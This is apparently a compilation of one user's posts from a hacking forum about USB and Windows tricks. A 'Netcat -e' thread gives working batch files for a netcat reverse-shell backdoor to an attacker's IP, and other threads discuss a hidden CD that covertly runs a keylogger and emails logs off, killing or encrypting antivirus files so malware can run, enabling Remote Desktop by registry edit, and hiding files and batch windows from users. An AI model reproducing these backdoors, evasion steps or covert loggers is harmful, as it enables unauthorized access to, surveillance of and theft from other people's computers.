[[MERGED] Website blocker through hosts file]

Topics merged. Please do not double post again.

Please accept my sincere apologies. I generally post all my stuff in the usb hacks forum.

After posting, I noticed that this doesn't really go under the category of usb drive hacks,

so I posted it in "Hacks and Mods" which I thought was a better place to put it.

Sorry again if this caused any inconvenience.

[[MERGED] Website blocker through hosts file]

Uses hosts files to display one website when another is accessed.

Kind of a simple concept...here it is anyway.

For example, using this tool, I could make it so that when I go to www.yahoo.com, I am given the page www.msn.com

Not really hacking...but interesting nevertheless.

http://www.mediafire.com/?9u91xnjypgz

[[MERGED] Website blocker through hosts file]

Kind of a simple concept...here it is anyway.

It's a batch file which replaces a site for another on a computer.

For example, using this tool, I could make it so that when I go to www.yahoo.com, I am given the page www.msn.com

Not really hacking...but interesting nevertheless.

http://www.mediafire.com/?9u91xnjypgz

[Netcat -e]

Me and a friend made a couple different scripts/payloads to install nc as a backdoor, read over the code here, NAT bypass and all that gravy is in there.  Enjoy!

http://forums.hak5.org/index.php/topic,7991.0.html

I like it! Keep up the good work.

[Netcat -e]

There's a really simple backdoor in Volume 21, Issue 4 of 2600.  It's called "Backdooring the NAT'ed Network", by David Dunn.  The tutorial in the article has you create two batch files...

- server.bat:

@echo off

cls

nc.exe -v -v -L -p <port>

- backdoor.bat:

@echo off

echo You have been owned.

nc -d -e cmd -t <IP address or FQDN> <port>

I just tried this with the copy of netcat for Windows linked to, earlier in this thread and it works fine.

Hope this helped.

Thanks so much for your help.

[PCGuard]

Are PCGuard encrypted executables typically detected by av?

Thanks.

[Use CD rather than USB drive]

something is up with my server for my site. ill have a rar up asap for you to see what i have done. keep in mind my code is very disorganized, im new to this. i haven't programmed since high school c++. it does work perfectly (except for the keylogger for now), but it is nowhere near finished. this is just a version that was thrown together to make sure it worked. with that being said, let me figure out why it wont upload.

No hurry.

Thanks.

[Netcat -e]

Do you have gcc or g++ installed (depending on which it needs)?

I guess I should know what those are. I don't.

Could you enlighten me?

Thanks.

[Netcat -e]

I have never used netcat before...and do not intend doing so on my own computer.

Recently, I've found several sources saying that the default netcat does not have the "-e" option automatically compiled.

In other words, unless netcat is separately compiled, it cannot function as a backdoor/remote access tool.

I download netcat from here:

http://www.vulnwatch.org/netcat/

Much appreciated.

[Use CD rather than USB drive]

I already have a working cd. in fact, the files are hidden, the cd 'looks' completely blank. the program files are copied to the computer, executed, and a log file appears in my inbox within 30 seconds. there is no sign anything happened at all. tested on 4 computers, no problems at all. afterwards, all the copied programs and such are removed from the system and no trace is left.

If it's not too much trouble, would you mind posting the files in something like a zip?

With MediaFire, the file can be hosted in a matter of seconds.

Thanks very much.

[Use CD rather than USB drive]

Sure, just one problem. USB drives put the information on the USB drive. Since cd's cannot be written to, the logs must be ftpd or email off.

Chances are, if your target is not your grandma, then the target's firewall will block the email leaving you with nothing. :(

Great idea though.

Actually *MOST* firewalls allow any outgoing traffic (even Smoothwall until recently by default allowed any outgoing traffic), And most people only use windows built in firewall.

Thanks for the information. Most people I know use either Mcafee or Norton. I believe that both block outbound until permission is

granted. Although this can be easily fixed by "netstop security center," the security center stops the ftp.

[hacksaw configuration]

Yes, this is a noob question.

What configurations do I have to make to the hacksaw to make it work?

[Use CD rather than USB drive]

so, instead of fighting with the auto run on non usb keys and hoping the person will run the program (if you are not accessing the computer), why cant this be installed on a cheap cd and instead of the information being written on the drive, it writes to the root directory *.log/*.rar, emails results, and deletes the file? the person gets what they need off the cd and is none the wiser?

in this case, autorun will obviously work (unless disabled completely) and if the cd is just blank, the person may just discard it, leaving no trace at all.

none of the programs, that i have seen, need to write to themselves or on the disk they are on, they write data where you tell it correct?

could this be done??

Sure, just one problem. USB drives put the information on the USB drive. Since cd's cannot be written to, the logs must be ftpd or email off.

Chances are, if your target is not your grandma, then the target's firewall will block the email leaving you with nothing. :(

Great idea though.

[ip address connection and $admin share]

2 questions...

1. What happens if I connect to an expired ip?

2. What is the $admin share

[VB vs VBS]

I know this may be a dumb question, but,

what's the difference?

Much appreciated.

[Is Sandisk Cruzer compatible with u3 Hacker?]

I recently purchased a 2 GB version of the Sandisk Cruzer.

Is this compatible with the U3 Hacker?

http://wiki.hak5.org/wiki//Universal_U3_LaunchPad_Hacker

Thanks very much.

[svchost.exe concern]

I just checked my taskmanager and there are 8 incidents of svchost.exe.

Does this probably mean I have a virus?

[Disabling Ctrl+Alt+Del/Taskmgr]

@ Sc0rpi0,

hmmm... yea that does sound a bit complicated. I'm gonna re-install mcaffee and see what I can think of. The way im setting mine up though I want the user to kill their own AV. For example the average user if they thought they might have a virus what's the first thing their gonna do... try to do a virus scan so my idea is to if virusprocess try's to execute then do this, etc.

I'm tryin to set something up so each step an average user would take to troubleshoot something like a virus it wil backfire, but I also have antidote:)

Sounds good! Please tell me how it goes.

Thanks.

[Disabling Ctrl+Alt+Del/Taskmgr]

@ Sc0rpi0,

Yes mcaffee and norton are the 2 im gonna be most concerned with, because that's what I mostly see on people's computers. Like sablefoxx said deleting or encrypting mcaffee files would be a good idea also... maybe if xp use built in windows encryption if possibly with a .bat file. Also most of these AV's have services that run and im not sure, but I think even if the process is killed the service or some type of service associated with the av is still running depending on av.

So you're saying to delete the program files? Just a suggestion, but wouldn't it be best to kill the processes, make a zipped copy of the

program files, delete them, run the otherwise-detected stuff, and finally replace the program files and rerun the processes?

Kind of complicated but maybe I'll create a special batch file package for just Norton and Mcafee.

I have Mcafee but most people I've talked to have Norton. Neither are pausible or completely killable. 

[Disabling Ctrl+Alt+Del/Taskmgr]

@ Sc0rpi0,

Yea I plan to use pskill to kill all existing av/spyware processes... or wouldn't it be better if instead of killing the process just stop the service temporarily ;)

Great idea! These anti-av tricks don't really work that well with mcafee.

Even with all of its processes killed, whenever a directory is accessed or a file run, the processes start again... :-(

Any idea?

[Startup Registry Question]

Is there a method of making a registry change so that a certain process can be prevented from being launched at startup?

Much appreciated.

[Remote Desktop]

If I enable remote desktop with this:

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f

does this mean that I can remotely login to my computer from anywhere? Do I need to make any more configs such as making firewall exceptions?

Please assume that I have configured my 3rd party firewall.

Is this a security hazard if I do not have a login password? Meaning, could anyone connect?

Much appreciated.

[looking for send.bat file]

Ok thanks man  8-)

But in fact the real problem did'nt solve exactly with showing the hidden files. I had to make windows show the system files indeed! In this case only i can see all the files of the folder sbs, tough i could see the files with the CLI.

Why is it considered by windows as system files indeed?

The reason why you had to tell windows to show the hidden and system files to see the hacksaw stuff

is because the hacksaw stuff was initially hidden to avoid being seen.

To make windows consider a file hidden and a system file, do this:

attrib "file location" +s +h

+s is what makes the file a "system file"

+h is what makes the file a "hidden file"

Hope this helps.

[switchblade commands question]

I was curious concerning two common switchblade commands.

What does the ">nul" do in this command:

if not exist ....Documentslogfiles md ....Documentslogfiles >nul

What does the"2>&1" do in the command:

ipconfig /all >> ....Documentslogfiles%computername%.log 2>&1

Thanks very much.

[how can I make a batch file completly invisible?]

Does anyone know of a way to make a batch file run completely invisible?

For some time now, I have been using nircmd, but a dos window pops up for a millisecond beforehand. 

Much appreciated.